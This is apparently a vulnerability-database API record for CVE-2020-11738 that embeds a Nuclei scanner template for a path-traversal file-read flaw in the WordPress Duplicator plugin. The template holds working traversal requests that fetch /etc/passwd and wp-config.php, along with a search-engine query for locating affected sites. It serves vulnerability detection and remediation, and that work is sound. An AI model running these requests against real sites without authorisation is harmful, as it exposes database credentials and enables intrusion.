{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-11738/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-11738/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-11738/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-11738/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-11738/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-11738"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-11738"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-11738.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2020-11738\n\ninfo:\n  name: WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion\n  author: dwisiswant0\n  severity: high\n  description: |\n    WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two\n    versions v1.3.24 and v1.3.26, the vulnerability wasn't\n    present in versions 1.3.22 and before.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.\n  remediation: |\n    Update the WordPress Duplicator plugin to the latest version (1.3.27 or higher) to mitigate the vulnerability.\n  reference:\n    - https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild\n    - https://snapcreek.com/duplicator/docs/changelog/?lite\n    - https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/\n    - http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-11738\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2020-11738\n    cwe-id: CWE-22\n    epss-score: 0.97822\n    epss-percentile: 0.99904\n    cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*\n  metadata:\n    max-request: 2\n    vendor: snapcreek\n    product: duplicator\n    framework: wordpress\n    google-query: inurl:\"/wp-content/plugins/duplicator\"\n  tags: cve,cve2020,kev,tenable,packetstorm,wordpress,wp-plugin,lfi,snapcreek,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\"\n      - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: header\n        regex:\n          - \"File Transfer\"\n          - \"application/octet-stream\"\n          - \"attachment; filename=\\\"(wp-config\\\\.php|passwd)\\\"\"\n        condition: and\n\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n          - \"define\\\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'\"\n        condition: or\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402202ad1604ba6fc03db7c6577c0ef66f862dff6141eb06907dda6581f862ba6009f022025f1a8130f7d56501c51de2eeba1ba50fa41bf6021ff00d62c53029285f18e79:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-11738"
}